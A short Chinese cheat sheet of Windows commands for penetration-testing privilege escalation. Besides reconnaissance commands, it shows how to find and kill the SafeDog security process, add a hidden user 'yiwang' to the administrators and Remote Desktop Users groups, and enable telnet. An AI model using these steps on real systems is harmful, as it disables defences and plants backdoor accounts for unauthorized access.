渗透测试提权命令

查看版本:ver
查看权限:whoami
查看配置:systeminfo
查看用户:net user
查看进程:tasklist
查看正在运行的服务:tasklist /svc
会显示所有进程的pid,找到安全狗的pid
通过taskkil命令l pid 可以关掉进程。
命令ntsd -c q -p PID 可以强行结束运行进程
查看开放的所有端口:netstat -ano
查询会话情况:query user
查看指定服务的路径:sc qc mssql
添加用户:net user yiwang yiwang /add
添加用户并提升权限:net localgroup administrators yiwang /add
查看指定用户的信息:net user molok
查看所有管理权限的用户:net localgroup administrators
加入远程桌面用户组:net localgroup “Remote Desktop Users” yiwang /add
突破最大连接数:mstsc /admin /v:192.168.1.101
删除用户:net user yiwang /del
开启TELNET服务:net start telnet

标签: none

添加新评论